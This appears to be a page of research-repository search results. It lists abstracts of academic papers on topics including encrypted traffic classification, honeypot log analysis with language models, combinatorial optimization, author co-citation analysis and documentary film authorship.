1,720,959 research outputs found
Language Models and Cybersecurity - Applications and Current Limits
L'abstract è presente nell'allegato / the abstract is in the attachmen
The Sweet Danger of Sugar: Debunking Representation Learning for Encrypted Traffic Classification
Recently we have witnessed the explosion of proposals that, inspired by Language Models like BERT, exploit Representation Learning models to create traffic representations. All of them promise astonishing performance in encrypted traffic classification (up to 98% accuracy). In this paper, with a networking expert mindset, we critically reassess their performance. Through extensive analysis, we demonstrate that the reported successes are heavily influenced by data preparation problems, which allow these models to find easy shortcuts - spurious correlation between features and labels - during fine-tuning that unrealistically boost their performance. When such shortcuts are not present - as in real scenarios - these models perform poorly. We also introduce Pcap-Encoder, an LM-based representation learning model that we specifically design to extract features from protocol headers. Pcap-Encoder appears to be the only model that provides an instrumental representation for traffic classification. Yet, its complexity questions its applicability in practical settings. Our findings reveal flaws in dataset preparation and model training, calling for a better and more conscious test design. We propose a correct evaluation methodology and stress the need for rigorous benchmarking
Neural combinatorial optimization beyond the TSP: Existing architectures under-represent graph structure
Recent years have witnessed the promise that reinforcement learning, coupled with Graph Neural Network (GNN) architectures, could learn to solve hard combinatorial optimization problems: given raw input data and an evaluator to guide the process, the idea is to automatically learn a policy able to return feasible and high-quality outputs. Recent works have shown promising results but the latter were mainly evaluated on the travelling salesman problem (TSP) and similar abstract variants such as Split Delivery Vehicle Routing Problem (SDVRP). In this paper, we analyze how and whether recent neural architectures can be applied to graph problems of practical importance. We thus set out to systematically "transfer" these architectures to the Power and Channel Allocation Problem (PCAP), which has practical relevance for, e.g., radio resource allocation in wireless networks. Our experimental results suggest that existing architectures (i) are still incapable of capturing graph structural features and (ii) are not suitable for problems where the actions on the graph change the graph attributes. On a positive note, we show that augmenting the structural representation of problems with Distance Encoding is a promising step toward the still-ambitious goal of learning multi-purpose autonomous solvers
The polynomial robust knapsack problem
This paper introduces a new optimization problem, namely the Polynomial Robust Knapsack Problem. It generalises the Robust Knapsack formulation to encompass possible relations between subsets of items having every possible cardinality. This allows to better describe the utility function for the decision maker, at the price of increasing the complexity of the problem. Thus, in order to solve realistic instances in a reasonable amount of time, two heuristics are proposed. The first one applies machine learning techniques in order to quickly select the majority of the items, while the second makes use of genetic algorithms to solve the problem. A set of simulation examples is finally presented to show the effectiveness of the proposed approaches
Towards NLP-based Processing of Honeypot Logs
Honeypots are active sensors deployed to obtain information about attacks. In their search for vulnerabilities, attackers generate large volumes of logs, whose analysis is time consuming and cumbersome. We here evaluate whether Natural Language Processing (NLP) approaches can provide meaningful representations to find common traits in attackers' activity. We consider a widely used SSH/Telnet honeypot to record more than 200,000 sessions, including 61,000 unique shell scripts, some containing sequences of more than 100 Bash commands. We first parse the sessions to separate Bash commands, options and parameters. Next, we project each session in a metric space opposing two common tools used in NLP: Bag of Words and Word2Vec. Last, we leverage a clustering algorithm to aggregate the sessions while offering an instrumental representation of the clustering process. In the end, we obtain few tens of clusters that we analyze to explain the attackers' goals, i.e., obtain system information, inject malicious accounts, download and run executables, etc. Our work is a first step towards automatically identifying attack patterns on honeypots, thus effectively supporting security activities
Going Beyond Counting First Authors in Author Co-citation Analysis
The present study examines one of the fundamental aspects of author co-citation analysis (ACA) - the way co-citation
counts are defined. Co-citation counting provides the data on which all subsequent statistical analyses and mappings
are based, and we compare ACA results based on two different types of co-citation counting - the traditional type that
only counts the first one among a cited work's authors on the one hand and a non-traditional type that takes into
account the first 5 authors of a cited work on the other hand. Results indicate that the picture produced through this non-traditional author co-citation counting contains more coherent author groups and is therefore considerably clearer. However, this picture represents fewer specialties in the research field being studied than that produced through the traditional first-author co-citation counting when the same number of top-ranked authors is selected and analyzed. Reasons for these effects are discussed
Variations on the Author
“Variations on the Author” discusses two of Eduardo Coutinho’s recent films (Um Dia na Vida, from 2010, and Últimas Conversas, posthumously released in 2015) and their contribution to the general question of documentary authorship. The director’s filmography is characterized by a consistent yet self-effacing form of authorial self-inscription: Coutinho often features as an interviewer that rather than express opinions propels discourses; an interviewer that is good at listening. This mode of self-inscription characterizes him as an author who is not expressive but who is nonetheless markedly present on the screen. In Um Dia na Vida, however, Coutinho is completely absent form the image, while Últimas Conversas, on the contrary, includes a confessional prologue that moves the director from the margins to the center of his films. This article examines the ways in which these works stand out in the filmography of a director who offers new insights into the notion of cinematic authorship
Appropriate Similarity Measures for Author Cocitation Analysis
We provide a number of new insights into the methodological discussion about author cocitation analysis. We first argue that the use of the Pearson correlation for measuring the similarity between authors’ cocitation profiles is not very satisfactory. We then discuss what kind of similarity measures may be used as an alternative to the Pearson correlation. We consider three similarity measures in particular. One is the well-known cosine. The other two similarity measures have not been used before in the bibliometric literature. Finally, we show by means of an example that our findings have a high practical relevance.information science;Pearson correlation;cosine;similarity measure;author cocitation analysis
LogPr\'ecis: Unleashing Language Models for Automated Malicious Log Analysis
The collection of security-related logs holds the key to understanding attack
behaviors and diagnosing vulnerabilities. Still, their analysis remains a
daunting challenge. Recently, Language Models (LMs) have demonstrated unmatched
potential in understanding natural and programming languages. The question
arises whether and how LMs could be also useful for security experts since
their logs contain intrinsically confused and obfuscated information. In this
paper, we systematically study how to benefit from the state-of-the-art in LM
to automatically analyze text-like Unix shell attack logs. We present a
thorough design methodology that leads to LogPr\'ecis. It receives as input raw
shell sessions and automatically identifies and assigns the attacker tactic to
each portion of the session, i.e., unveiling the sequence of the attacker's
goals. We demonstrate LogPr\'ecis capability to support the analysis of two
large datasets containing about 400,000 unique Unix shell attacks. LogPr\'ecis
reduces them into about 3,000 fingerprints, each grouping sessions with the
same sequence of tactics. The abstraction it provides lets the analyst better
understand attacks, identify fingerprints, detect novelty, link similar
attacks, and track families and mutations. Overall, LogPr\'ecis, released as
open source, paves the way for better and more responsive defense against
cyberattacks.Comment: 18 pages, Computer&Security
(https://www.sciencedirect.com/science/article/pii/S0167404824001068), code
available at https://github.com/SmartData-Polito/logprecis, models available
at https://huggingface.co/SmartDataPolit
- …
